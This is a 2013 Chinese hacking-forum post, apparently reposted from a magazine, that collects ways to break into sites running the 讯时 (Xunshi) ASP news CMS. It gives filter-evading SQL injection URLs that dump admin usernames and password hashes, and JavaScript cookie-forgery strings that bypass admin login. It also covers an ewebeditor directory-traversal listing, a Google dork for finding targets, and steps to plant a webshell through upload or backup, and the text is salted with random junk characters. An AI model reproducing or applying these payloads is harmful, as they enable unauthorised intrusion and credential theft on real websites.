找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2532|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘' ~+ u5 \) m( g# ~. b8 S' R7 Z

2 ^' s$ ^6 W9 {在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)4 P9 k6 [7 F5 q- a! X$ |1 |

0 R5 G3 @9 P: @& D以下本文总结来自黑防去年第9期杂志上的内容...5 G7 z2 T% }$ |/ _6 C

3 z5 V7 m% T+ l# n9 d+ B4 N先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%  E, ^  F( \; F8 z+ I- O

0 |% l/ ^; @0 T  W0 S; t26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 : e& O  q0 H, F6 S, X4 j
+ t' N  \3 ^/ o1 M. ]7 |; e
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
6 Q6 z5 O1 p4 F# F- D这里一个注入
! t. W4 `( a" Q8 G5 |. ^0 l1 z
" x% r) E1 N; ^0 _" O  P; a# p* I8 s6 i效果如图:
! v# T( V4 X. g, e& T. b
3 Q2 K3 u" {- r2 D4 x/ q0 [! N5 K: N
+ w6 W2 F$ s6 |* W; m- g& v- p. n6 I! A+ v
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.4 c4 _, ?( ]6 H- E) v
7 G6 k$ O5 s1 A! X0 @( u. ^  u$ r
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去3 t5 Y9 t+ u' c. S+ Z7 `

; [. h: ^) K: U  Y2 }  p* t# o* \: O; njavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));; x1 N. P: a$ }5 ~6 w4 k! P3 @! J
9 x0 Q% m6 u8 H: q* U# x6 `4 O
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
) u& Q- P. |1 R$ Z# i7 L
1 U5 c5 |2 A/ w7 T因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞- l! [$ m' U/ H7 t6 C- h

6 K( s, ~* r, E1 O它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以9 A+ O& z# I# g; }, f' _- m- I! y9 p

, Y1 N, P  [6 q) \7 a/ a3 }, _- \/ ]访问这页面来列目录..步骤如下:! e* z' r! ^0 x! ~
: K8 P# m+ x5 Y" _5 f; _8 t
javascript:alert(document.cookie="admindj=1") " ^5 q1 I/ m- ]& i2 T; Y& @6 m
3 j, K% Z# _/ W8 q" }' f7 c
http://www.political-security.co ... asp?id=46&dir=../..
7 j6 i& }1 q7 G% {6 l, @5 b( Q) t, ?8 F* F. `7 |/ }
效果如图:! o- j( e( i+ p6 T

2 O2 h3 k- i' N/ e5 E" `9 Z
& [* y3 C' V0 x3 W# r# l
2 g$ H4 G- K9 O7 T) L这样全站目录都能瞧了..找到后台目录..进去..2 w9 g" A# p6 P, Z) a) Z

3 i: y3 B/ ?; O那么进了后台怎么拿shell??上传--备份就ok了..
8 Z! a1 X' Z! U/ c- y1 d/ k  V4 P% x
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
# [2 W0 q; I4 g( ~$ c, u6 n# D5 e8 D! s; T& ?! W
这个我也碰到过一次..你都可以通过列目录来实现..
2 ?5 H7 l+ {# T$ B( _
2 i4 E' n2 T) |$ X# O( Pjavascript:alert(document.cookie="admindj=1") ! \& v9 {) h  Z4 z" Z

# W& ]7 i, H' m& _) Ihttp://www.political-security.co ... p?action=BackupData
4 t( h4 P9 r7 e3 C9 D2 U
$ p  ~' u6 E  \. p  S备份ok..
  M6 ?+ B6 B8 O. T+ ~& ]% s+ ~
$ K1 S: [' e5 [; A8 {那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
6 f$ I4 l/ g! z. u( d/ L7 l9 _: \: P5 E" }
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
2 P  D$ |0 z5 A6 y
! _5 I  t6 y4 J6 x* @, ~然后访问此页面进行注入..步骤如下:3 ]: N2 A. R/ O3 ^" o3 _
5 O* e7 i$ L& S; Q
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")8 [% N2 i3 L8 M& `0 E: t

) J0 j/ V, }2 J6 @, [" c6 w然后请求admin/admin_chk.asp页面) T1 {  p/ ?, \5 P
9 {2 s% i# _) T
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
7 j9 k$ |. j. @* d" r1 J
/ r+ }; l3 F8 l( k6 }' o26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin# Y+ s( y" [1 f
- ?/ M; o" a2 e& e4 j$ Q
效果如图所示:. D( O* M$ t4 s# w1 u7 O9 g, G

+ c8 B- v) {& u7 _, ~" I+ }- p $ w( b8 t7 I+ N+ ]9 Q
3 ?5 @0 D; |* ~
讯时漏洞2
% }% ]* F' Z7 D5 Z: o) igoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
  {6 f: f/ W+ G- L" {3 Q, l1 f  L 1 }. i8 p4 e- c* ~
1、/admin/admin_news_pl_view.asp?id=1$ M% |  f, v9 n2 g% u
//id任意 填入以下语句
- T5 x/ s: L& m. l& V3 d9 ~9 T ! B1 q8 n+ h/ z5 }  S2 T/ n
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!; V  D& ]6 [2 ]: H8 X. A. p) Z

4 y  P4 H" d! |& C' _! y
3 {* H; r4 S2 u
1 a; @8 Q: I; Y3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='9 b8 p% F  o, f& e
2 O5 _% h$ n+ g; E/ g% K: m
9 U9 Y5 n3 i, Q+ b
& @8 A# S- Q1 c2 m, i
爆出管理员帐号和密码了  D8 H! {" }) W& `5 b$ x& k

* Q2 Q9 o& L  H) k) _$ C0 z) r3 c, c' a

7 W. g$ J% ~9 x. |1 V( N/ f4、cookies进后台
: H! B0 W/ u. q6 J5 w- \
3 q, K- b8 T7 d* ^/ d. O+ ?: `javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
0 s( y  G! \; H8 o2 t 5 x( |7 T& `0 y3 h& g
4 @/ F( M/ S7 Q; ]

& D* p2 y! }6 e# X5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
4 s$ H6 w/ q. w9 ?
( N& w. U0 n9 K0 U+ S
: Z' e% u) J$ D5 k  I8 H5 J0 T) m! ~: ~4 ]( W
6、后台有上传和备份取SHELL不难。& I  U% Z0 Q+ `) O: A7 E
7 Y+ _/ Q5 W- R' u0 @. e
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
, H, A2 {5 r2 G( k& z
3 Q$ m( C% _4 k( z9 P7 D. j逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!% L, K0 C9 S/ e
( S' g# ?3 Z! B5 Q1 A

) r0 w( V& u4 J" r
/ W$ a& q0 x: ~" \) {
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表